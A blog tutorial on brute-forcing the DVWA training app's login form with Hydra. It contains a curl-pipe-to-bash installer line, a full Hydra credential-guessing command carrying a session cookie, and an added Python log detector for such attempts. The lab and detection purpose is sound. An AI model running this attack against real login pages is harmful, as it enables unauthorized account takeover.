Brute Force Attack DVWA with Hydra

Andres Cabeza
Jun 29, 2024


Hello! Today I’m going to share a simple command using a couple of tools to break the DVWA brute force lab.

Note: This is an educational tutorial. I am not responsible for any misuse of this tutorial.

Prerequisites

For this tutorial, I’m using an Ubuntu machine, but you can use Kali Linux as well. First, let’s install the necessary tools.

Step 1: Install and Configure DVWA

To get started, we need to set up the DVWA project. You can clone the repository and configure an Apache server with PHP, or install DVWA via Docker (https://hub.docker.com/r/vulnerables/web-dvwa). Alternatively, the following installer script sets it up for you:

sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)"
Figure 1: DVWA project installed on your machine

Step 2: Install Hydra

Next, we need to install the Hydra tool for password cracking. Even if you’re using Kali Linux, you may need to build and configure it:

git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra
./configure
make
sudo make install
hydra
Figure 2: Hydra command tool

Step 3: Prepare the Password Dictionary

You will need a dictionary of passwords. On Kali Linux the crunch tool is available to generate a password dictionary; on another Linux machine you can install it. For this tutorial, I'm using the list of the 100k most used passwords from the Daniel Miessler repo.

Step 4: Identify the Target

Inspect the target page to identify the names of the username and password fields and the form submission method (GET in this case).

Figure 3: DVWA brute force attack
Figure 4: Form source code
Figure 5: Incorrect password

Step 5: Get the Failure Message

Identify the message that appears when the login fails, for example, “Username and/or password incorrect.”

Step 6: Get the Session ID

Obtain the session ID (the PHPSESSID cookie) so that the requests are treated as part of your logged-in session and are not redirected to the login page. Depending on your browser, you can retrieve it in several ways, such as from the browser's cookie storage or through a proxy.

Step 7: Execute the Attack

The main command for the brute force attack with Hydra is:

hydra -L users.txt -P 100k-most-used-passwords-NCSC.txt localhost http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=medium; PHPSESSID=sessionID:Username and/or password incorrect." -V

Let’s break down the command:

  • -L: file with the usernames to try
  • -P: the password dictionary
  • -V: verbose mode, printing every username/password attempt
  • localhost: the target host
  • http-get-form: the Hydra module for forms submitted with GET
  • /DVWA/vulnerabilities/brute/: the path of the login form
  • username=^USER^&password=^PASS^&Login=Login: the form parameters; Hydra replaces ^USER^ and ^PASS^ with each entry from the two lists
  • H=Cookie: security=medium; PHPSESSID=sessionID: a header sent with every request so the attempts run inside the session from Step 6 (replace sessionID with your own PHPSESSID value)
  • Username and/or password incorrect.: the failure message from Step 5; a response that does not contain it is reported as a valid login
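From the defender's side, the same GET parameters and path show up in the web server's access log, one line per attempt. As an added example (not part of the original tutorial), here is a small Python detector that parses Apache-style log lines and flags a source IP that tries many distinct passwords for one username within a short window. The log lines are constructed, and the threshold and window size are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

LOGIN_PATH = "/DVWA/vulnerabilities/brute/"  # the form targeted in the tutorial
# Apache combined-log prefix: ip ident user [timestamp] "METHOD url PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_attempts(log_text):
    """Yield (ip, time, username, password) for each GET login attempt to LOGIN_PATH."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        parts = urlsplit(m["url"])
        if parts.path != LOGIN_PATH:
            continue
        qs = parse_qs(parts.query)
        if "username" not in qs or "password" not in qs:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, qs["username"][0], qs["password"][0]

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {(ip, username): n} for pairs with >= threshold distinct passwords in one window."""
    by_key = defaultdict(list)
    for ip, ts, user, pw in parse_attempts(log_text):
        by_key[(ip, user)].append((ts, pw))
    alerts = {}
    for key, events in by_key.items():
        events.sort()
        for i, (start, _) in enumerate(events):  # sliding window starting at each attempt
            distinct = len({pw for ts, pw in events[i:] if ts - start <= window})
            if distinct >= threshold:
                alerts[key] = max(alerts.get(key, 0), distinct)
    return alerts

def _line(ip, second, user, pw):
    """Constructed log line in the shape Hydra's http-get-form requests produce."""
    return (f'{ip} - - [29/Jun/2024:10:15:{second:02d} +0000] '
            f'"GET {LOGIN_PATH}?username={user}&password={pw}&Login=Login HTTP/1.1" 200 4521 "-" "Mozilla/5.0"')

# Constructed sample: six guesses for "admin" from one IP, then one ordinary login and a page view.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", s, "admin", pw) for s, pw in
     enumerate(["123456", "password", "letmein", "qwerty", "admin", "welcome"])]
    + [_line("10.0.0.9", 30, "gordonb", "abc123")]
    + ['10.0.0.9 - - [29/Jun/2024:10:15:31 +0000] "GET /DVWA/index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"']
)
```

Running `detect_bruteforce(SAMPLE_LOG)` flags only the ("10.0.0.5", "admin") pair; the single legitimate login from 10.0.0.9 stays below the threshold.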

Finally, we get this result:

Figure 6: password cracked
Figure 7: password obtained

This should guide you through the process of performing a brute force attack on DVWA using Hydra. Remember to use this knowledge responsibly.

Thanks for reading! I hope you found this tutorial helpful. Remember to use these tools responsibly. 🛡️💻

See you next time! 🚀😊
